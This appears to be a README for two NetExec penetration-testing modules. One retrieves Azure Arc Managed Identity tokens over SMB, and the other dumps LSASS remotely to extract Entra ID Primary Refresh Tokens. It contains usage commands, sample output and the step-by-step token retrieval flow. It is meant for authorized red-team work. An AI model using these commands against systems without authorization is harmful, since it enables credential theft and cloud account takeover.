Two specialized modules for Azure/Entra ID reconnaissance and credential extraction during penetration testing engagements.
Enumerates Azure Arc presence on Windows targets and, when present, retrieves a Managed Identity access token from the local Arc IMDS endpoint using the documented 401 challenge → .key file → second request flow.
- Protocol: SMB (requires local administrator privileges)
- Primary use case: Rapidly map Arc deployment and obtain a cloud-scoped token for Azure control-plane enumeration during red team engagements.
- Presence check (`CHECK=true`): Detects the Arc agent by listing well-known install paths.
- Token retrieval (default): Executes the IMDS challenge/response locally on the target and returns JSON containing `access_token`.
Presence check only:

```
nxc smb <target> -u <USER> -p <PASS> -M azurearc -o CHECK=true
```

Token dump:

```
nxc smb 192.168.1.100 -u USER -p 'PASS' -M azurearc
[*] Attempting to retrieve Azure Arc Managed Identity access token
[+] Managed Identity token retrieved
{
  "access_token": "eyJhbGciOi......",
  "expires_on": "1730812345",
  "token_type": "Bearer",
  "resource": "https://management.azure.com"
}
```

Presence check via SMB listing:

```
C:\Program Files\AzureConnectedMachineAgent*
C:\Program Files (x86)\AzureConnectedMachineAgent*
```
Token retrieval on target (PowerShell):
- GET `http://localhost:40342/metadata/identity/oauth2/token?resource=...&api-version=...` → expect 401 with `WWW-Authenticate: Basic realm="<path to .key>"`
- Read the `.key` contents (requires local admin)
- Second GET with `Authorization: Basic <contents of the .key file>` to obtain the token JSON
- Write the JSON to a temp file, fetch it via SMB, and delete the file
- Local admin required on the target (matches Arc's security boundary)
- Tokens are written to a temp file on the target only long enough to read back via SMB, then deleted
- Be mindful of token lifetime and endpoint logging
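For the token-lifetime note above, an added example that is not part of the module: it decodes the unverified payload of the returned `access_token`, reports audience and tenant, and computes the remaining lifetime from `expires_on`. The token JSON below is constructed in the shape the module prints, with a hand-made, unsigned JWT (assumed claim layout, not a real token).

```python
import base64
import json
import time


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


# Constructed sample mirroring the module's output; the JWT is unsigned and
# exists only so the decoding below has something realistic to work on.
SAMPLE_EXP = 1730812345
SAMPLE_TOKEN_JSON = {
    "access_token": ".".join([
        _b64url(b'{"alg":"RS256","typ":"JWT"}'),
        _b64url(json.dumps({
            "aud": "https://management.azure.com",
            "iss": "https://sts.windows.net/00000000-0000-0000-0000-000000000000/",
            "exp": SAMPLE_EXP,
        }).encode()),
        "sig",
    ]),
    "expires_on": str(SAMPLE_EXP),
    "token_type": "Bearer",
    "resource": "https://management.azure.com",
}


def decode_jwt_payload(token: str) -> dict:
    """Decode the payload segment of a compact JWT without verifying it."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT")
    payload = parts[1] + "=" * (-len(parts[1]) % 4)  # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))


def inspect_token(token_json: dict, now=None) -> dict:
    """Summarise audience, issuing tenant and remaining lifetime of a token JSON."""
    now = int(time.time()) if now is None else now
    claims = decode_jwt_payload(token_json["access_token"])
    expires_on = int(token_json.get("expires_on", claims["exp"]))
    aud = claims.get("aud", "").rstrip("/")  # audience may carry a trailing slash
    issuer = claims.get("iss", "").rstrip("/")
    return {
        "audience": aud,
        "tenant_id": claims.get("tid") or issuer.rsplit("/", 1)[-1],
        "seconds_remaining": expires_on - now,
        "expired": expires_on <= now,
        "audience_matches_resource": aud == token_json.get("resource", "").rstrip("/"),
    }
```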
Reference:
- NSIDE Attack Logic - Azure Arc - Part 1 - Escalation from On-Premises to Cloud: https://www.nsideattacklogic.de/azure-arc-part-1-escalation-from-on-premises-to-cloud/
Detects Azure AD (Entra ID) joined devices and enumerates user profiles with CloudAP/PRT artifacts, then optionally dumps LSASS memory to extract Primary Refresh Tokens (PRTs) for Azure AD authentication bypass.
- Protocol: SMB (pure SMB operations for checks; admin required for dumps)
- Primary use case: Identify Azure AD joined machines, locate users with PRTs, and extract tokens for cloud lateral movement.
- Azure AD join detection (`ACTION=check`): Checks device join status via SMB and enumerates user profiles with TokenBroker/NGC artifacts indicating likely PRT presence
- LSASS dump (`ACTION=dump`): Remotely dumps LSASS via lsassy, downloads the dump locally, and auto-parses CloudAP sections with pypykatz
Check Azure AD join status and scan for user artifacts:

```
nxc smb <target> -u <USER> -p <PASS> -M cloudap -o ACTION=check
CLOUDAP  10.0.0.1  445  dev-machine1  [+] Device is AzureAdJoined
CLOUDAP  10.0.0.1  445  dev-machine1  [*] Scanning user profiles for AzureAD authentication artifacts...
CLOUDAP  10.0.0.1  445  dev-machine1  [+] Found 2 user(s) with AzureAD artifacts:
CLOUDAP  10.0.0.1  445  dev-machine1      • admin.dev-machine1: TokenBroker
CLOUDAP  10.0.0.1  445  dev-machine1      • brother: TokenBroker
```

Dump LSASS and extract CloudAP credentials:

```
nxc smb <target> -u <USER> -p <PASS> -M cloudap -o ACTION=dump METHOD=comsvcs SAVE_DIR=.
CLOUDAP  10.0.0.1  445  dev-machine1  [+] Dumping LSASS via lsassy (method: comsvcs)
CLOUDAP  10.0.0.1  445  dev-machine1  [+] Saved LSASS dump to /root/.nxc/modules/cloudap/10.0.0.1_lsass.dmp
CLOUDAP  10.0.0.1  445  dev-machine1  [+] cloudap section #1 (pypykatz):
    cloudap : PRT : {"Prt":"eyJ0eXAiOi...","ProofOfPossesionKey":"...","TenantId":"..."}
    DPAPI Key: a1b2c3d4... (sha1: ...)
```

Azure AD join detection (ACTION=check):
- Connects to the target via SMB using the `C$` share
- Lists the `C$\Users\*` directory to enumerate user profiles
- For each user, checks the existence of Azure AD artifact paths, for example:
  - `AppData\Local\Microsoft\TokenBroker\Cache`
  - `AppData\Local\Microsoft\Ngc`
- Reports users with artifacts (indicating likely PRT presence)
LSASS dump flow (ACTION=dump):
- Uses lsassy to remotely dump LSASS memory (no binary uploads)
- Downloads dump via SMB to local directory
- Auto-parses dump with pypykatz library API
- Extracts CloudAP sections containing PRTs, DPAPI keys, and metadata
- Cleans up remote dump file
- ACTION=dump requires local admin and creates forensic artifacts (LSASS dump)
- Consider EDR detection when dumping LSASS memory
References:
- Dirk-jan: https://dirkjanm.io/digging-further-into-the-primary-refresh-token/ and https://dirkjanm.io/assets/raw/romhack_dirkjan.pdf
- pypykatz: http://github.com/skelsec/pypykatz
- lsassy: https://github.com/login-securite/lsassy
Both modules are included in NetExec. Place the files in:

```
nxc/modules/azurearc.py
nxc/modules/cloudap.py
```

- azurearc: No additional dependencies
- cloudap: Requires lsassy and pypykatz for `ACTION=dump`:

```
pip install lsassy pypykatz
```

These modules are part of NetExec and follow the same license.
These tools are for educational purposes only.